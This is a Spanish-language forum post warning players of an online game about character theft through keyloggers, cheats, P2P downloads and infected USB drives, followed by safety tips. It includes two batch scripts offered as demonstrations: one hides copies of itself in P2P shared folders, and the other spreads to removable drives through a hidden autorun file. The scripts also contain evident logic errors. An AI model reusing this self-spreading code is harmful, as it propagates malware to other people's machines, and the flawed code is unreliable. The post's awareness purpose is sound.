Mini-Guia para prevenir robos de pjs



  • Hago este simple post porque como veo que muchos no le hacen caso a los gm cuando estos dicen no des datos de los pj's o cosas por el estilo y hasta llegan a decir "estos tipos son cualquiera", voy a mostrar no solamente cuan facil es robar un pj, si no tambien los metodos que se pueden usar, para que vean que los robos de pj's no son solo por que uno da los datos, si no tambien por programas maliciosos que vienen de "otros lados". Ademas que voy a probar las formas en las que pueden llegar, ya que por hay algunos dicen que voy a inventar y todo eso, y lo voy a demostrar con codigos de fuente muy simples, asi para los que no saben se van a dar cuenta cuan facil y disimulado, y por cuales medios pueden venir las amenazas y para que aprendan que deben tomar precaucion.

    Muchas veces los robos de pj's SI son porque uno les da mucha informacion sobre el pj a un "amigo" y este puede manipular el pj, puede robarlo completamente si conoce el PIN o simplemente puede vaciarlo (Lo cual frustra mucho). Pero, no solo los robos vienen por ese medio, hay programas a los que se los denomina "Virus informatico" (Que a su vez se clasifican en Virus, Gusanos y Troyanos) que pueden provocar (Ademas de un desastre en la PC) la perdida de pj's, ya que estoy pueden registrar la actividad de la pc, o bien pueden registrar las teclas. Estos programas maliciosos se los denomina Keyloggers, registran teclas, y las envian al ordenador de lo que la mayoria de la gente llamaria "hacker", cuando en realidad es un imbecil que no sabe otra cosa que hacer mas que usar un keylogger que por hay nisiquiera fue programado por el.
    Y como pueden llegar estos virus?
    METODO 1 y mas sencillo:
    MSN. Llegan mensajes como "Mira esta foto" o cosas por el estilo, y se envia un archivo comprimido en RAR, o ZIP, el cual es un virus. Probablemente si lo descomprimen vana ver que es un archivo con extension de foto, .JPG, pero existen programas llamdos "joiners" que adjuntan un archivo a otro, y se ejecutan los dos al mismo tiempo, entonces uno puede ejecutar la foto y de forma oculta ejecuta el virus que registra las teclas. Con esto queda claro en NO CONFIAR EN ARCHIVOS COMPRIMIDOS SOSPECHOSOS, y mas si el que manda el archivo es digamos muy "Pete" en el tds y saben que haria lo que sea por unas moneditas de oro…
    METODO 2 y el "mas merecido"
    Bajando cheats, que ademas de estar contra las reglas pueden venir con regalitos desagradables, y se dan cuenta un dia que a su pj le falta todo :).
    Digo merecido porque no hay razon por la cual uno pueda protestar en este caso ya que si estabas bajando un cheat te tendrian que bannear de forma permanente.
    METODO 3
    Redes Peer2Peer (P2P: Ares, eMule, Kazaa, LimeWire, etc)
    Estos programas que generalmente se usan para descargar musica, parches, juegos, etc, tambien son MUY inseguros... Cuando digo MUY inseguros es porque son MUY inseguros... Voy a poner un simple codigo Batch (Aunque la mayoria de los virus que se replican por estos medios suelen ser en VB, C, C++, Python, etc... Pero esto no es un curso de programacion asi que no voy a hace nada en C++ xD) en el que se muestra que tan facil un archivo llega a las "vias" p2p y se pone a disposicion de otra pc 🙂

    @Echo off
    If %ErrorLevel%==1 (Exit) Else (Call:CheckP2P)
    :CheckP2P
    ChDir %ProgramFiles%
    For %%a In (Ares, eMule, Kazaa) Do (Set P2P_Server=%%a)
    If Exist %P2P_Server% (If Exist "Ares" (
    Copy /y %0 "Ares\My Shared Folder\NombreVirus.extension"
    )
    ) Else (
    If Exist "eMule" (Copy /y %0 "eMule\Incoming\NombreVirus.extension") Else (
    If Exist "Kazaa" (Copy /y %0 "Kazaa\Incoming\NombreVirus.extension")
    )
    Attrib +s +r +h "eMule\Incoming\NombreVirus.extension"
    Attrib +s +r +h "Ares\My Shared Folder\NombreVirus.extension"
    Attrib +s +r +h "Kazaa\Incoming\NombreVirus.extension"
    Exit

    Que demuestro con esto?
    Cuan simple es que un archivo llegue por las redes p2p a tu pc 🙂
    PD: NombreVirus.extension es el nombre con el que se copia el virus, si se copia como "foto.jpg" y nosotros buscamos en el programa p2p "foto.jpg" entonces saldra este archivo infectado.

    METODO 4, el mp4 o el celu... o un CD.

    Este metodo se llama replicacion por USB o unidades removibles. Consiste en que el virus venga en cualquier dispositivo que guarde informacion (CD, DVD, MP3, MP4, CELU, PENDRIVE, ETC).
    Es muy simple y lo voya demostrar para que me crean:

    @Echo off
    SetLocal ENABLEDELAYEDEXPANSION
    If [%ErrorLevel%] EQU 1 (Exit)
    For %%a In (A,B,C,D,E,F,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z) Do (Set Rm_Drives=%%a:)
    If Exist %Rm_Drives% (Copy /y %0 %Rm_Drives%\virus.extension & Call:CreateAUTORUN)
    :CreateAUTORUN
    ChDir %Rm_Drives%
    Echo>>Autorun.inf
    Set e=Echo
    Call:ScriptAUT
    :ScriptAUT
    %e%[Autorun]>Autorun.inf
    %e%Open=Virus.extension>Autorun.inf
    %e%Icon=Icono.ico>Autorun.inf
    For /L %%a In (0,1,2) Do (Attrib +s +r +h autorun.inf)
    For /L %%b In (0,1,2) Do (Attrib +s +r +h Virus.extension)
    Exit

    Que explico con esto, que los virus pueden venir tambien en el cel de tu "mejor amigo" que viene a mostrarte un programa para editar pj's del tds…
    El problema de esto es que al abrir la unidad removible simplemente se ejecuta el virus, el cual el codigo anterior lo hace invisinble y autoejecutable. Para que se autoejecute existe el autorun, el cual es un archivo que indica que archivo debe ejecutarse.
    Es muy simple esto que explique, pero si toman en cuenta las sgtes. precauciones van a poder evitar el robo de pj's de forma mas eficiente:
    1- No descargar cheats ni nada relacionado al TDS, a excepcion que el programa lo hayan subido los GM o algo.
    2- No aceptar archivos ejecutables que se hacen intentar pasar por fotos o algo.
    3- Siempre tener un AV actualizado.
    4- Tener las extensiones habilitadas y tambien que se muestren archivo de sistema y ocultos (Para lo de extensiones habilitadas vayan a mi pc, y en la parte de arriba dice herramientas, dan en opciones de carpeta, donce dice "ver" desmarcan la opcion "Ocultar extensiones para archivo conocidos", y en el mismo lugar busquen "mostrar archivos y carpetas ocultas" y tambien busquen ahi "mostrar archivos de sistema") Una vez concluido esto van a tener un panorama mas amplio de los archivo que descargan/reciben, y a su vez mas seguridad.
    En fin, espero que esto les haya servido aunque sea para darse cuenta de la inseguridad que hay hoy en dia con las computadoras, y en el TDS... Si hay algo que quieran acotar para que los que lean tengan mas conocimientos sobre la seguridad de los pj's y demas posteen nada mas...
    Saludos..
    Atte. Death_Scripter.


Log in to reply